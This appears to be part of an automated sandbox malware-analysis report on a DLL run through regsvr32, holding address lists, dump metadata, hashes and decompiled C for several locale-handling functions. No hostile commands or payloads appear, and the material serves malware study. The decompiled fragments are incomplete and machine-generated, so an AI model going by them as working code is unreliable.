                                                                      0x18004ead3
                                                                      0x18004eadb
                                                                      0x18004eae4
                                                                      0x18004eaeb
                                                                      0x18004eaef
                                                                      0x18004eaf3
                                                                      0x18004eafc
                                                                      0x18004eb04
                                                                      0x18004eb09
                                                                      0x18004eb0f
                                                                      0x18004eb0f
                                                                      0x18004eb16
                                                                      0x18004eb1b
                                                                      0x18004eb25
                                                                      0x18004eb2a
                                                                      0x18004eb30
                                                                      0x18004eb39
                                                                      0x18004eb3d
                                                                      0x18004eb46
                                                                      0x18004eb4b
                                                                      0x18004eb51
                                                                      0x18004eb5a
                                                                      0x18004eb5e
                                                                      0x18004eb67
                                                                      0x18004eb6e
                                                                      0x18004eb72
                                                                      0x18004eb76
                                                                      0x18004eb7f
                                                                      0x18004eb86
                                                                      0x18004eb8d
                                                                      0x18004eb91
                                                                      0x18004eb95
                                                                      0x18004eb9e
                                                                      0x18004eba5
                                                                      0x18004ebac
                                                                      0x18004ebb0
                                                                      0x18004ebb4
                                                                      0x18004ebbd
                                                                      0x18004ebc4
                                                                      0x18004ebcb
                                                                      0x18004ebcf
                                                                      0x18004ebd8
                                                                      0x18004ebdf
                                                                      0x18004ebe3
                                                                      0x18004ebea
                                                                      0x18004ebee
                                                                      0x18004ebf2
                                                                      0x18004ebfb
                                                                      0x18004ec02
                                                                      0x18004ec09
                                                                      0x18004ec0d
                                                                      0x18004ec11
                                                                      0x18004ec1a
                                                                      0x18004ec21
                                                                      0x18004ec28
                                                                      0x18004ec2c
                                                                      0x18004ec30
                                                                      0x18004ec39
                                                                      0x18004ec40
                                                                      0x18004ec47
                                                                      0x18004ec4b
                                                                      0x18004ec4f
                                                                      0x18004ec58
                                                                      0x18004ec5f
                                                                      0x18004ec64
                                                                      0x18004ec6a
                                                                      0x18004ec73
                                                                      0x18004ec77
                                                                      0x18004ec80
                                                                      0x18004ec85
                                                                      0x18004ec8b
                                                                      0x18004ec94
                                                                      0x18004ec98
                                                                      0x18004eca1
                                                                      0x18004eca6
                                                                      0x18004ecac
                                                                      0x18004ecb5
                                                                      0x18004ecb9
                                                                      0x18004ecc2
                                                                      0x18004ecc7
                                                                      0x18004eccd
                                                                      0x18004ecd6
                                                                      0x18004ecdd
                                                                      0x18004ece6
                                                                      0x18004eceb
                                                                      0x18004ecf1
                                                                      0x18004ecfa
                                                                      0x18004ed01
                                                                      0x18004ed0a
                                                                      0x18004ed11
                                                                      0x18004ed11
                                                                      0x18004ed18
                                                                      0x18004ed1e
                                                                      0x18004ed26
                                                                      0x18004ed2e
                                                                      0x18004ed35
                                                                      0x18004ed3a
                                                                      0x18004ed42
                                                                      0x18004ed4a
                                                                      0x18004ed52
                                                                      0x18004ed5c
                                                                      0x18004ed61
                                                                      0x18004ed69
                                                                      0x18004ed6f
                                                                      0x18004ed6f
                                                                      0x18004ed75
                                                                      0x18004ed77
                                                                      0x18004ed79
                                                                      0x18004ed7f
                                                                      0x18004ed82
                                                                      0x18004ed86
                                                                      0x18004ed88
                                                                      0x18004ed8f
                                                                      0x18004ed91
                                                                      0x18004ed94
                                                                      0x18004ed98
                                                                      0x18004eda1
                                                                      0x18004eda3
                                                                      0x18004eda9
                                                                      0x18004edb7
                                                                      0x18004edba
                                                                      0x18004edbe
                                                                      0x18004edc2
                                                                      0x18004edc7
                                                                      0x18004edcb
                                                                      0x18004edd0
                                                                      0x18004edd4
                                                                      0x18004edd9
                                                                      0x18004eddd
                                                                      0x18004ede2
                                                                      0x18004ede6
                                                                      0x18004edeb
                                                                      0x18004edef
                                                                      0x18004edf4
                                                                      0x18004edf8
                                                                      0x18004edfe
                                                                      0x18004ee02
                                                                      0x18004ee0c
                                                                      0x18004ee11
                                                                      0x18004ee13
                                                                      0x18004ee23
                                                                      0x18004ee31
                                                                      0x18004ee40
                                                                      0x18004ee4f
                                                                      0x18004ee5e
                                                                      0x18004ee62
                                                                      0x18004ee69
                                                                      0x18004ee6b
                                                                      0x18004ee78
                                                                      0x18004ee7a
                                                                      0x18004ee87
                                                                      0x18004ee8c
                                                                      0x18004ee93
                                                                      0x18004ee9c
                                                                      0x18004eea8
                                                                      0x18004eead
                                                                      0x18004eeb6
                                                                      0x18004eebd
                                                                      0x18004eee1

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57bfa210e22e213c562ad2216ee2e897c181cbb6d7bcd3e327afd8b5dd3d4bbd
                                                                      • Instruction ID: c0da30c9cc3a2b23464476a126920b7d7491ac201f19d4006db9f56c97404c63
                                                                      • Opcode Fuzzy Hash: 57bfa210e22e213c562ad2216ee2e897c181cbb6d7bcd3e327afd8b5dd3d4bbd
                                                                      • Instruction Fuzzy Hash: A5E18F32604B8486EB61DB61E4857EE37A4F7997C8F028625AF9D53796EF39C348C340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E00000001180051128(void* __ecx, signed int __edx, void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
                                                                      				void* _v8;
                                                                      				signed int _v24;
                                                                      				char _v264;
                                                                      				unsigned int _t22;
                                                                      				signed int _t23;
                                                                      				void* _t25;
                                                                      				unsigned int _t33;
                                                                      				intOrPtr _t38;
                                                                      				signed int _t40;
                                                                      				signed long long _t54;
                                                                      				signed long long _t55;
                                                                      				void* _t57;
                                                                      				unsigned int* _t68;
                                                                      				signed long long _t70;
                                                                      				void* _t72;
                                                                      
                                                                      				_t65 = __rdx;
                                                                      				_t40 = __edx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_t54 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t55 = _t54 ^ _t72 - 0x00000120;
                                                                      				_v24 = _t55;
                                                                      				_t57 = __rcx;
                                                                      				E00000001180038680(_t55, __rcx, __rdx, __rsi);
                                                                      				_t70 = _t55;
                                                                      				E00000001180038680(_t55, _t57, _t65, _t70);
                                                                      				_t68 =  *((intOrPtr*)(_t55 + 0x3a0));
                                                                      				_t22 = E0000000118005151C(_t57, _t65);
                                                                      				r9d = 0x78;
                                                                      				_t33 = _t22;
                                                                      				asm("sbb edx, edx");
                                                                      				_t23 = GetLocaleInfoW(??, ??, ??, ??);
                                                                      				if (_t23 != 0) goto 0x800511a3;
                                                                      				 *_t68 =  *_t68 & _t23;
                                                                      				goto 0x8005120b;
                                                                      				_t25 = E0000000118005A81C((_t40 & 0xfffff002) + 0x1001, _t55,  *((intOrPtr*)(_t70 + 0x98)));
                                                                      				_t38 =  *((intOrPtr*)(_t70 + 0xb0));
                                                                      				if (_t25 != 0) goto 0x800511c7;
                                                                      				if (_t38 != 0) goto 0x800511f8;
                                                                      				goto 0x800511ea;
                                                                      				if (_t38 != 0) goto 0x80051201;
                                                                      				if ( *((intOrPtr*)(_t70 + 0xac)) == _t38) goto 0x80051201;
                                                                      				if (E0000000118005A81C( *((intOrPtr*)(_t70 + 0x98)) + 1, _t55,  *((intOrPtr*)(_t70 + 0x98))) != 0) goto 0x80051201;
                                                                      				if (E00000001180051470(_t33, 0, _t55, _t57,  *((intOrPtr*)(_t70 + 0x98)),  &_v264, _t70) == 0) goto 0x80051201;
                                                                      				 *_t68 =  *_t68 | 0x00000004;
                                                                      				_t68[1] = _t33;
                                                                      				_t68[2] = _t33;
                                                                      				return E00000001180002FB0( !( *_t68 >> 2) & 0x00000001, _t33, _v24 ^ _t72 - 0x00000120);
                                                                      			}


















                                                                      0x180051128
                                                                      0x180051128
                                                                      0x180051128
                                                                      0x18005112d
                                                                      0x18005113a
                                                                      0x180051141
                                                                      0x180051144
                                                                      0x18005114c
                                                                      0x18005114f
                                                                      0x180051154
                                                                      0x180051157
                                                                      0x18005115f
                                                                      0x180051166
                                                                      0x180051178
                                                                      0x180051180
                                                                      0x180051182
                                                                      0x180051190
                                                                      0x180051198
                                                                      0x18005119a
                                                                      0x1800511a1
                                                                      0x1800511af
                                                                      0x1800511b4
                                                                      0x1800511bc
                                                                      0x1800511c0
                                                                      0x1800511c5
                                                                      0x1800511c9
                                                                      0x1800511d1
                                                                      0x1800511e6
                                                                      0x1800511f6
                                                                      0x1800511f8
                                                                      0x1800511fb
                                                                      0x1800511fe
                                                                      0x18005122f

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastValue$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 673564084-0
                                                                      • Opcode ID: 144d1bd96f503b0ab39ee6dc7cdcb7e7aac8fc1954e5260f006e87e774533467
                                                                      • Instruction ID: 4c9d3c618345de17d54af200c99fb756c0985d33405a4c8e6939d00728e47bd3
                                                                      • Opcode Fuzzy Hash: 144d1bd96f503b0ab39ee6dc7cdcb7e7aac8fc1954e5260f006e87e774533467
                                                                      • Instruction Fuzzy Hash: F13193323006898AFBA6CB22E4413EA73A1F74C7C5F44C125FB5993785DF39D6598740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 30%
                                                                      			E00000001180050D74(void* __ecx, void* __edx, void* __rax, long long __rbx, signed int* __rcx, void* __rdx, signed int __r8, long long _a8) {
                                                                      				signed int _t35;
                                                                      				signed char _t36;
                                                                      				signed char _t37;
                                                                      				signed int _t52;
                                                                      				void* _t54;
                                                                      				signed int* _t58;
                                                                      				signed short** _t65;
                                                                      				void* _t66;
                                                                      				signed long long _t71;
                                                                      				signed long long _t72;
                                                                      				signed long long _t74;
                                                                      
                                                                      				_t54 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_t58 = __rcx;
                                                                      				E00000001180038680(__rax, __rcx, __rdx, _t66);
                                                                      				_t71 = __r8 | 0xffffffff;
                                                                      				_t2 = _t54 + 0x98; // 0x98
                                                                      				_t65 = _t2;
                                                                      				_t74 = _t71 + 1;
                                                                      				if (( *_t65)[_t74] != 0) goto 0x80050d99;
                                                                      				_t65[3] = 0 | _t74 == 0x00000003;
                                                                      				_t72 = _t71 + 1;
                                                                      				if (_t65[1][_t72] != 0) goto 0x80050db3;
                                                                      				r8d = 2;
                                                                      				_t65[3] = 0 | _t72 == 0x00000003;
                                                                      				_t58[1] = 0;
                                                                      				if (_t65[3] != 0) goto 0x80050e02;
                                                                      				r10d = 0;
                                                                      				r9d =  *( *_t65) & 0x0000ffff;
                                                                      				_t16 = _t74 - 0x41; // 0x58
                                                                      				if (_t16 - 0x19 <= 0) goto 0x80050dfa;
                                                                      				r9w = r9w - 0x61;
                                                                      				if (r9w - 0x19 > 0) goto 0x80050dff;
                                                                      				r10d =  &(r10d[0]);
                                                                      				goto 0x80050ddd;
                                                                      				r8d = r10d;
                                                                      				_t65[2] = r8d;
                                                                      				_t35 = EnumSystemLocalesW(??, ??);
                                                                      				_t52 =  *_t58 & 0x00000007;
                                                                      				asm("bt ecx, 0x9");
                                                                      				_t36 = _t35 & 0xffffff00 | _t52 > 0x00000000;
                                                                      				asm("bt ecx, 0x8");
                                                                      				_t37 = _t36 & 0xffffff00 | _t52 > 0x00000000;
                                                                      				if ((_t37 & (0 | _t52 != 0x00000000) & _t36) != 0) goto 0x80050e36;
                                                                      				 *_t58 = 0;
                                                                      				return _t37;
                                                                      			}














                                                                      0x180050d74
                                                                      0x180050d74
                                                                      0x180050d7e
                                                                      0x180050d81
                                                                      0x180050d86
                                                                      0x180050d8f
                                                                      0x180050d8f
                                                                      0x180050d99
                                                                      0x180050da1
                                                                      0x180050dac
                                                                      0x180050db3
                                                                      0x180050dbb
                                                                      0x180050dc3
                                                                      0x180050dcc
                                                                      0x180050dcf
                                                                      0x180050dd5
                                                                      0x180050dda
                                                                      0x180050ddd
                                                                      0x180050de4
                                                                      0x180050dec
                                                                      0x180050dee
                                                                      0x180050df8
                                                                      0x180050dfa
                                                                      0x180050dfd
                                                                      0x180050dff
                                                                      0x180050e02
                                                                      0x180050e12
                                                                      0x180050e1a
                                                                      0x180050e20
                                                                      0x180050e24
                                                                      0x180050e29
                                                                      0x180050e2d
                                                                      0x180050e32
                                                                      0x180050e34
                                                                      0x180050e40

                                                                      APIs
                                                                        • Part of subcall function 0000000180038680: GetLastError.KERNEL32 ref: 000000018003868F
                                                                        • Part of subcall function 0000000180038680: FlsGetValue.KERNEL32 ref: 00000001800386A4
                                                                        • Part of subcall function 0000000180038680: SetLastError.KERNEL32 ref: 000000018003872F
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,0000000180050B77,?,00000000,00000092,?,?,00000000,?,000000018003F795), ref: 0000000180050E12
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                      • String ID:
                                                                      • API String ID: 3029459697-0
                                                                      • Opcode ID: d53e6b5c71d7f88b0e65e2438884c7e87b5e8342fb7976a3acc687f7021426d7
                                                                      • Instruction ID: 5418aeb5cc02e58e824ad7602bf35b3630b3e6a8fe1831fdf6bfb173631f1a4b
                                                                      • Opcode Fuzzy Hash: d53e6b5c71d7f88b0e65e2438884c7e87b5e8342fb7976a3acc687f7021426d7
                                                                      • Instruction Fuzzy Hash: 8C11E1B7A04648CAEB968F69D0403ED7BA0F788BE0F65C115E626533C0DE75D6D9C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E00000001180051290(void* __ecx, signed int __edx, void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rsi) {
                                                                      				unsigned int _t20;
                                                                      				signed int _t35;
                                                                      				unsigned int _t39;
                                                                      				signed long long _t45;
                                                                      				signed long long _t46;
                                                                      				void* _t50;
                                                                      				void* _t59;
                                                                      				unsigned int* _t60;
                                                                      				long long _t64;
                                                                      				void* _t67;
                                                                      				signed long long _t68;
                                                                      
                                                                      				_t62 = __rsi;
                                                                      				_t57 = __rdx;
                                                                      				_t35 = __edx;
                                                                      				 *((long long*)(_t67 + 0x10)) = __rbx;
                                                                      				 *((long long*)(_t67 + 0x18)) = _t64;
                                                                      				 *((long long*)(_t67 + 0x20)) = __rsi;
                                                                      				_t68 = _t67 - 0x120;
                                                                      				_t45 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t46 = _t45 ^ _t68;
                                                                      				 *(_t68 + 0x110) = _t46;
                                                                      				_t50 = __rcx;
                                                                      				E00000001180038680(_t46, __rcx, __rdx, __rsi, _t59);
                                                                      				E00000001180038680(_t46, _t50, _t57, _t62);
                                                                      				_t60 =  *((intOrPtr*)(_t46 + 0x3a0));
                                                                      				_t20 = E0000000118005151C(_t50, _t57);
                                                                      				r9d = 0x78;
                                                                      				_t39 = _t20;
                                                                      				asm("sbb edx, edx");
                                                                      				if (GetLocaleInfoW(??, ??, ??, ??) != 0) goto 0x80051310;
                                                                      				 *_t60 = 0;
                                                                      				goto 0x8005134f;
                                                                      				if (E0000000118005A81C((_t35 & 0xfffff005) + 0x1002, _t46,  *((intOrPtr*)(_t46 + 0xa0))) != 0) goto 0x80051345;
                                                                      				if (_t39 ==  *0x80064058) goto 0x80051345;
                                                                      				if (1 - 0xa < 0) goto 0x8005132c;
                                                                      				 *_t60 =  *_t60 | 0x00000004;
                                                                      				_t60[2] = _t39;
                                                                      				_t60[1] = _t39;
                                                                      				return E00000001180002FB0( !( *_t60 >> 2) & 0x00000001, _t20,  *(_t68 + 0x110) ^ _t68);
                                                                      			}














                                                                      0x180051290
                                                                      0x180051290
                                                                      0x180051290
                                                                      0x180051290
                                                                      0x180051295
                                                                      0x18005129a
                                                                      0x1800512a0
                                                                      0x1800512a7
                                                                      0x1800512ae
                                                                      0x1800512b1
                                                                      0x1800512b9
                                                                      0x1800512bc
                                                                      0x1800512c4
                                                                      0x1800512cc
                                                                      0x1800512d3
                                                                      0x1800512e5
                                                                      0x1800512ed
                                                                      0x1800512ef
                                                                      0x180051307
                                                                      0x180051309
                                                                      0x18005130e
                                                                      0x180051323
                                                                      0x18005132f
                                                                      0x18005133a
                                                                      0x18005133c
                                                                      0x18005133f
                                                                      0x180051342
                                                                      0x180051377

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastValue$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 673564084-0
                                                                      • Opcode ID: b015ce9e8c97aaa88087f77f35154abcab26167e0701ca971605ac3fb807800a
                                                                      • Instruction ID: 2e83c80a3f41b3264ac3d8ce287933778afb6176d938fae5558963fa4fba9169
                                                                      • Opcode Fuzzy Hash: b015ce9e8c97aaa88087f77f35154abcab26167e0701ca971605ac3fb807800a
                                                                      • Instruction Fuzzy Hash: D421BE32200B888AEBA28F21E4413DA33A5F34CBC0F488125FA9D87749DF39D759CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 19%
                                                                      			E00000001180051470(signed int __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, intOrPtr _a8, long long _a16, long long _a24) {
                                                                      				int _t13;
                                                                      				signed int _t17;
                                                                      				void* _t26;
                                                                      				void* _t35;
                                                                      				void* _t43;
                                                                      				signed short* _t51;
                                                                      
                                                                      				_t43 = __rdx;
                                                                      				_t35 = __rax;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_t26 = __edx;
                                                                      				_t17 = __ecx;
                                                                      				E00000001180038680(__rax, __rbx, __rdx, __rsi);
                                                                      				r9d = 2;
                                                                      				asm("bts ecx, 0xa");
                                                                      				_t13 = GetLocaleInfoW(??, ??, ??, ??);
                                                                      				r10d = 0;
                                                                      				if (_t13 == 0) goto 0x80051509;
                                                                      				if (_t17 == _a8) goto 0x80051502;
                                                                      				if (_t26 == 0) goto 0x80051502;
                                                                      				_t51 =  *((intOrPtr*)(_t35 + 0x98));
                                                                      				r8d = r10d;
                                                                      				if (_t43 - 0x41 - 0x19 <= 0) goto 0x800514e3;
                                                                      				if (( *_t51 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x800514ef;
                                                                      				r8d = r8d + 1;
                                                                      				goto 0x800514d0;
                                                                      				if (_t51[( &(_t51[2]) | 0xffffffff) + 1] != r10w) goto 0x800514f3;
                                                                      				if (r8d == (_t17 & 0x000003ff)) goto 0x80051509;
                                                                      				goto 0x8005150b;
                                                                      				return 0;
                                                                      			}









                                                                      0x180051470
                                                                      0x180051470
                                                                      0x180051470
                                                                      0x180051475
                                                                      0x18005147f
                                                                      0x180051481
                                                                      0x180051483
                                                                      0x180051495
                                                                      0x18005149b
                                                                      0x1800514a7
                                                                      0x1800514ad
                                                                      0x1800514b2
                                                                      0x1800514b8
                                                                      0x1800514bc
                                                                      0x1800514be
                                                                      0x1800514c5
                                                                      0x1800514d7
                                                                      0x1800514e1
                                                                      0x1800514e6
                                                                      0x1800514ed
                                                                      0x1800514fb
                                                                      0x180051500
                                                                      0x180051507
                                                                      0x18005151a

                                                                      APIs
                                                                        • Part of subcall function 0000000180038680: GetLastError.KERNEL32 ref: 000000018003868F
                                                                        • Part of subcall function 0000000180038680: FlsGetValue.KERNEL32 ref: 00000001800386A4
                                                                        • Part of subcall function 0000000180038680: SetLastError.KERNEL32 ref: 000000018003872F
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,0000000180051041), ref: 00000001800514A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocaleValue
                                                                      • String ID:
                                                                      • API String ID: 3796814847-0
                                                                      • Opcode ID: 46b3d6124bff625af8e4bc369d61108f3be2f1532fcdae086826888ae64c5712
                                                                      • Instruction ID: d4cb7fac6f42b35ea795dfcc7e7d1a58e03453b89c2df36ff93b6e51de8f1583
                                                                      • Opcode Fuzzy Hash: 46b3d6124bff625af8e4bc369d61108f3be2f1532fcdae086826888ae64c5712
                                                                      • Instruction Fuzzy Hash: 85115932214658CAEBF65B52E0447EE23A1F78C7E2F509221FB27136C4EE36CA85C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E00000001180051090(void* __ecx, void* __edx, void* __rax, long long __rbx, signed char* __rcx, void* __rdx, signed int __r8, long long _a8) {
                                                                      				int _t17;
                                                                      				void* _t25;
                                                                      				void* _t29;
                                                                      				signed char* _t31;
                                                                      				signed short* _t36;
                                                                      				void* _t38;
                                                                      				signed long long _t44;
                                                                      				void* _t45;
                                                                      
                                                                      				_t29 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_t31 = __rcx;
                                                                      				E00000001180038680(__rax, __rcx, __rdx, _t38);
                                                                      				_t45 = _t29;
                                                                      				_t36 =  *((intOrPtr*)(_t29 + 0x98));
                                                                      				_t44 = (__r8 | 0xffffffff) + 1;
                                                                      				if (_t36[_t44] != 0) goto 0x800510b2;
                                                                      				_t25 = _t44 - 3;
                                                                      				 *(_t45 + 0xb0) = 0 | _t25 == 0x00000000;
                                                                      				if (_t25 == 0) goto 0x800510fb;
                                                                      				r9d = 0;
                                                                      				r8d =  *_t36 & 0x0000ffff;
                                                                      				if (_t44 - 0x41 - 0x19 <= 0) goto 0x800510f3;
                                                                      				r8w = r8w - 0x61;
                                                                      				if (r8w - 0x19 > 0) goto 0x800510f8;
                                                                      				r9d = r9d + 1;
                                                                      				goto 0x800510d6;
                                                                      				 *((intOrPtr*)(_t45 + 0xac)) = r9d;
                                                                      				_t17 = EnumSystemLocalesW(??, ??);
                                                                      				if (( *_t31 & 0x00000004) != 0) goto 0x8005111b;
                                                                      				 *_t31 = 0;
                                                                      				return _t17;
                                                                      			}











                                                                      0x180051090
                                                                      0x180051090
                                                                      0x18005109a
                                                                      0x18005109d
                                                                      0x1800510a6
                                                                      0x1800510ab
                                                                      0x1800510b2
                                                                      0x1800510ba
                                                                      0x1800510be
                                                                      0x1800510ca
                                                                      0x1800510d1
                                                                      0x1800510d3
                                                                      0x1800510d6
                                                                      0x1800510e5
                                                                      0x1800510e7
                                                                      0x1800510f1
                                                                      0x1800510f3
                                                                      0x1800510f6
                                                                      0x1800510fb
                                                                      0x18005110e
                                                                      0x180051117
                                                                      0x180051119
                                                                      0x180051125

                                                                      APIs
                                                                        • Part of subcall function 0000000180038680: GetLastError.KERNEL32 ref: 000000018003868F
                                                                        • Part of subcall function 0000000180038680: FlsGetValue.KERNEL32 ref: 00000001800386A4
                                                                        • Part of subcall function 0000000180038680: SetLastError.KERNEL32 ref: 000000018003872F
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,0000000180050B33,?,00000000,00000092,?,?,00000000,?,000000018003F795), ref: 000000018005110E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                      • String ID:
                                                                      • API String ID: 3029459697-0
                                                                      • Opcode ID: 5d16288c0c2d7572ae6a96f2d2ca0d69d2ba622ba55ec5fcaa284e8281e29bc5
                                                                      • Instruction ID: 3aeff940c085bbe2686674e55d915e1ce77d6d85835dce24e31b6fbfd3875c0a
                                                                      • Opcode Fuzzy Hash: 5d16288c0c2d7572ae6a96f2d2ca0d69d2ba622ba55ec5fcaa284e8281e29bc5
                                                                      • Instruction Fuzzy Hash: 5301F1726046888AE7A24F16E4807ED76E1E748BE1F45D222F261572C4CFB686C9C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
